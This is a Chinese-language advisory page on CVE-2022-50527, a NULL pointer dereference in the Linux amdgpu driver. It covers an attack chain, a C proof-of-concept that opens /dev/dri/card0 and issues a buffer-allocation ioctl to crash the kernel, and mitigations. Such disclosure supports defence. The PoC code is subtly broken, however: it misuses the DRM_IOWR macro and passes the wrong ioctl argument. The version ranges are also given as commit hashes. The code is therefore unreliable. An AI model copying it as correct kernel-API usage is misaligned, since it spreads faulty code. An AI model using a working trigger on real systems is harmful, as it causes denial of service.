CVE-2022-50527 Linux内核amdgpu驱动空指针解引用漏洞

漏洞信息

漏洞编号

CVE-2022-50527

漏洞类型

空指针解引用

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux内核 (drm/amdgpu驱动)

漏洞概述

CVE-2022-50527是Linux内核中AMD GPU驱动（amdgpu）的一个空指针解引用漏洞。该漏洞存在于amdgpu_bo_validate_size()函数中，当请求内存域的TTM（Translation Table Maps）域管理器不存在时，代码会尝试解引用一个空指针（man），从而导致内核崩溃（kernel oops）。该漏洞影响使用AMD显卡的Linux系统，特别是那些集成了Radeon图形处理器的设备。漏洞的CVSS评分为5.5，属于中危级别，攻击者需要本地低权限访问即可触发该漏洞。虽然该漏洞不会导致信息泄露或数据篡改，但会造成系统可用性受到影响，可能导致系统拒绝服务（DoS）。该问题已在Linux内核的多个稳定版本中通过补丁修复，主要的修复方式是增加对TTM域管理器指针的空值检查，确保在解引用之前验证指针的有效性。

技术细节

该漏洞的技术原理如下：amdgpu_bo_validate_size()函数用于验证AMD GPU缓冲区对象（BO）的大小是否符合要求。在验证过程中，函数需要访问TTM域管理器（ttm_mem_type_manager），通过man指针进行操作。然而，当请求的内存域（如GTT域）对应的TTM域管理器未被初始化或不存在时，man指针可能为NULL。原始代码没有对man指针进行空值检查就直接进行解引用操作，导致内核空指针解引用错误，触发kernel oops。

漏洞利用方式相对简单：攻击者需要具有本地系统的低权限访问权限（PR:L），通过特定的内核接口或系统调用，触发amdgpu_bo_validate_size()函数的执行，并使函数请求一个未初始化的TTM域。由于该漏洞仅影响可用性（A:H），不涉及机密性（C:N）和完整性（I:N）影响，攻击者主要利用该漏洞进行本地拒绝服务攻击，导致系统崩溃或不稳定。

修复方案经历了四个版本迭代：v1版本最初修复了大小验证逻辑；v2版本使补丁独立，不依赖于本地补丁；v3版本保留旧行为，仅检查管理器指针不为NULL；v4版本增加了对GTT域未初始化时的警告提示，因为这种情况很可能是一个bug。

攻击链分析

STEP 1

步骤1

攻击者获取目标系统的本地低权限访问权限

STEP 2

步骤2

通过打开AMD GPU设备文件（如/dev/dri/card0）获取设备句柄

STEP 3

步骤3

构造特定的ioctl调用，请求分配缓冲区对象并指定未初始化的TTT域

STEP 4

步骤4

amdgpu_bo_validate_size()函数被调用，尝试访问未初始化的TTM域管理器

STEP 5

步骤5

空指针解引用发生，触发内核oops，导致系统崩溃或拒绝服务

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2022-50527 PoC - Trigger NULL pointer dereference in amdgpu_bo_validate_size()
// This PoC demonstrates how to trigger the vulnerability by requesting
// a memory domain whose TTM manager is not initialized.

#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <drm/drm.h>
#include <drm/amdgpu_drm.h>

int main() {
    int fd;
    struct drm_amdgpu_bo_alloc_request req = {0};
    struct drm_amdgpu_bo_info info = {0};
    uint32_t handle;
    int ret;

    // Open the AMD GPU device
    fd = open("/dev/dri/card0", O_RDWR);
    if (fd < 0) {
        perror("Failed to open AMD GPU device");
        return 1;
    }

    // Set up buffer object allocation request
    req.size = 4096;  // 4KB buffer
    req.alignment = 4096;
    req.domains = AMDGPU_GEM_DOMAIN_GTT;  // Request GTT domain
    req.domain_flags = 0;

    // Attempt to allocate buffer object
    // This may trigger amdgpu_bo_validate_size() with uninitialized TTM manager
    ret = ioctl(fd, DRM_IOWR(DRM_AMDGPU_BO_ALLOC, &req), &handle);
    if (ret < 0) {
        perror("Buffer allocation failed");
    }

    close(fd);
    return 0;
}

// Note: Actual exploitation requires specific kernel configuration
// where the GTT domain manager is not properly initialized.

影响范围

Linux kernel < 7554886daa31eacc8e7fac9e15bbce67d10b8f1f

Linux kernel < 80546eef216854a7bd47e39e828f04b406c00599

Linux kernel < 8ba7c55e112f4ffd2a95b99be1cb1c891ef08ba1

防御指南

临时缓解措施

在无法立即升级内核的情况下，可以通过限制本地用户对AMD GPU设备文件的访问权限来降低风险，例如修改设备文件的权限或使用SELinux/AppArmor等强制访问控制机制限制对/dev/dri/card*设备的访问。同时，监控系统日志中的内核oops信息，及时发现异常情况。